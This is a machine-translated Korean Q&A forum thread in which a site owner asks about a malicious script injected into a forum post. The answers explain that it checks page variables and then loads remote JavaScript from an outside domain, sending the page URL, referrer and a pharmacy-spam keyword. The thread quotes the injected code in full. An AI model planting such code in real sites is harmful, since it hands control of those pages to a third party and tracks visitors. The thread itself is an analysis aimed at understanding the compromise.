2009-07-28 2 views
2
<SCRIPT> 
    ff = 0; 
    for (nn in document) if (nn == 'etours' || nn == 'logo-anim') ff = 1; 
    if (ff == 0 || (/LIVE|MSN|YAHOO|GENERIC|NORVASC/.test (document.referrer.toUpperCase()) && false)) { 
    document.write('<SCRIPT SRC ="http://p090303.info/w.php?l='+ escape(location.href) + '&k=' + escape('generic norvasc') + '&r=' + escape(document.referrer) + '"><' + '/SCRIPT>'); document.write ('<' + '!--'); 
    } 
</SCRIPT> 

이 코드를 인식합니까? 많은 웹 사이트에서 멈추지 만 모든 문자가 16 진수 또는 8 진수로 대체되었습니다. 누군가가이 코드를 아빠의 사이트 중 한 곳의 게시물에 올렸지 만, 내가하는 일을 정확히 파악할 수는 없습니다. 그것은 리퍼러에게 웹 페이지의 매핑을 수확하는 것 같지만 처음 몇 라인이 무엇을하는지 알 수는 없습니다. 여기에 무슨 일이 일어 났는지 아무도 모른다.악의적 인 자바 스크립트가 포럼에 게시되었습니다

답변

5

페이지에 스크립트 태그를 쓰고 있습니다. 자바 스크립트를 가리키고 있습니다. 그들의 자바 스크립트는 귀하의 웹 사이트에서 실행되어 그들이 귀하의 웹 사이트에 무엇이든 할 수있게합니다.

첫 번째 몇 줄은 스크립트 내에서 만들어진 변수에 대한 검사입니다. 스크립트 태그가 이미 작성되었는지 확인하는 것과 관련이있을 수 있습니다.

2

종속성 (다른 코드로 설정된 javascript 변수)을 확인한 다음 집에 전화를 걸어 홈 서버가 어떤 페이지에 감염되었는지 알도록합니다. 키예프에서 Home appears to be here.

관련 문제